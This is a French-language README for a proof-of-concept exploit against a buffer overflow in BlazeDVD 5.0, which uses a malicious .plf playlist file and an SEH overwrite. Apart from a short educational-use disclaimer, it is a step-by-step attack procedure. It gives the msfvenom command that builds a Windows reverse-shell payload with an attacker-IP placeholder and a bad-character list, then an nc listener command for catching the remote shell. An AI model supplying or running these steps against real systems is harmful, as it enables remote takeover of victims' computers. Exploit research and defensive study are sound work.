
Preuve de concept (PoC) exploitant une vulnérabilité de dépassement de tampon dans BlazeDVD version 5.0 via un fichier de liste de lecture .plf malveillant. L'exploit utilise un écrasement de SEH (Structured Exception Handler) pour parvenir à l'exécution de code.
.plfCe code est uniquement à des fins éducatives et de recherche. Toute utilisation abusive de ce code peut enfreindre les lois locales ou internationales. Je n'assume aucune responsabilité en cas de dommages causés par une utilisation inappropriée.
L'exploit génère un fichier .plf malveillant qui, une fois ouvert dans BlazeDVD, déclenche un dépassement de tampon et écrase le SEH (Structured Exception Handler), redirigeant l'exécution vers une charge utile de shell inversé.
Générer le shellcode avec msfvenom
Utilisez msfvenom pour créer une charge utile de shell inversé au format brut, en évitant les caractères interdits.
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=8443 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
Remplacez le shellcode dans le script de l'exploit par la sortie de msfvenom.
Démarrer Netcat (Listener) Dans un autre terminal, commencez à écouter sur le port choisi 8443 :
nc -lvnp 8443
Récupérer le shell inversé En cas de succès, un shell inversé se connectera à votre listener.